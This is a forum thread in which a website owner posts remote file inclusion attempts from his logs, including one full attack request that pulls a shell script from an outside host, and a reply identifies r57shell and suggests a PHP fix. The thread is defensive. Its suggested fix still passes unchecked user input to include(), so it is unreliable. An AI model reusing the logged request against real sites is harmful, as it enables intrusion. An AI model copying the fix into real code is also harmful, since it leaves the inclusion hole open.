Jump to content

I think I am being hacked.


zeroanarchy

Recommended Posts

Hi I was wondering if someone had a couple of minutes to check out these links and tell me what the code is attempting to do.

 

http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84

http://www.iglesialcs.cl/newweb/images/id2.txt?? | IP: 85.119.244.16

http://www.phanom.ac.th/msnlist/id.txt | IP: 85.214.28.190

http://www.rom.as.ro/id1.txt | IP: 67.205.76.81

http://www.trosken.com/test.txt | IP: 203.146.102.38

http://russianinterpreter.ru/images/stories/idd.txt | IP: 74.200.223.106

http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84

 

 

An example of them being run are as follows:

mysite//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://geocities.com/rais_corp/tusuk.txt???

 

luckly I have a very good method of tracking 404 errors so if a hacker hits a 404 I am able to catch him and block the IP address reletively quickly.

 

As you can see I have included the ip addresses of the machines attempting to run these files against my site.

 

All help greatly appreaciated.

 

zeroanarchy

Link to comment
https://forums.phpfreaks.com/topic/115577-i-think-i-am-being-hacked/
Share on other sites

The first one is a r57shell.

Second one doesn't look harmful as much.

Third one is the same as the second.

Fourth is the same as the third.

Fifth is checking if you have commands like exec or passthru enabled (I think).

Sixth is the same as the fourth.

Seventh is the same as the first (r57shell).

 

They're trying to inject a shell into your site so they can have access to it.

A shell is "A generic term that refers to the interface that gives the user control over the system.". You should report that site to Yahoo or Geocities and have it taken down.

 

Steps to fix this problem?

If you have something like:

include($_GET["dir_inc"].".php");

They can inject their own files to your server.

Try using something like:

if (file_exists($_SERVER["DOCUMENT_ROOT"]."/".$_GET["dir_inc"].".php")) {
  include($_GET["dir_inc"].".php");
}
else {
  echo("Not found/hacking attempt.");
}

 

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.